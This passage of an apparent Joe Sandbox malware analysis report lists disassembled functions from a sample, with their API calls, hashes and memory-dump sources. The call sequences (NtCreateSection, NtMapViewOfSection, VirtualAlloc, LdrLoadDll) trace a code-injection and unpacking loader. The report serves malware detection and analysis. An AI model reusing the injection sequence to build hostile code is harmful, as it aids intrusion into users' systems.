NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02C685B9 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C685E1
Module32First.KERNEL32(00000000,00000224), ref: 02C68601

Memory Dump Source

Source File: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c61000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 5638706fd11c020b331f1c3aca631142e625416a57be165bf4ab5e3e1604227f
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 62F090322007146BE7203BF9A8CCB7F76EDAF89624F100728F642914C0DBB0E9494A69

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 02AE003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02AE024D

Strings

kernel32.dll, xrefs: 02AE008F, 02AE0095
cess, xrefs: 02AE018D

Memory Dump Source

Source File: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e1503dcbf6bfa6c87ad212dfcd52574371eaed5ed88a405e5b76968050bc0c67
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 51526A74A01229DFDB64CF68C985BACBBB1BF09304F1480D9E54EAB351DB70AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02AE0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02AE0223,?,?), ref: 02AE0E19
SetErrorMode.KERNELBASE(00000000,?,?,02AE0223,?,?), ref: 02AE0E1E

Memory Dump Source

Source File: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae0000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 731b4b15cc113421926b247db6d5c2baff6a257aa3ccfd2646a570e6be9fcf7d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BED0123114512877DB003B94DC09BCD7B1CDF05B66F008021FB0DE9080CBB0954146E5

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

Function 02C68278 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C682C9

Memory Dump Source

Source File: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c61000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 50039313e5e2bfa39dcac2ae716c1c5d92802f8646a23f6eabd08b0b492c4755
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2B113F79A00208EFDB01DF98C985E98BBF5AF08350F1980A4F9489B361D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000000.00000002.1803883551.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AE092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 02AE095F
l, xrefs: 02AE0966
GetProcAddress., xrefs: 02AE09DC, 02AE09DF, 02AE09E4

Memory Dump Source

Source File: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5f92c792442d9c8e466d441e335bf801e22ac2cb632ac8aa3b66937aeaad2781
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: B63139B6900609DFDB10CF99C880AAEBBF5FF58324F55404AD442B7210D7B5EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02C67E96 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c61000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: eba67940ac0dae1f2d780ea6f412bdb23f83a6cf1588f9c99d2dd14294c22798
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 0D118E72340100AFDB54DF55DCC4EB6B3EAEB89324B1984A5ED08CB315D676EC06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02AE0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ae0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 1c01d99ea77098bb105b6cf18ffaf1e7007a673d396d169ad2dd96ed6739f093
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
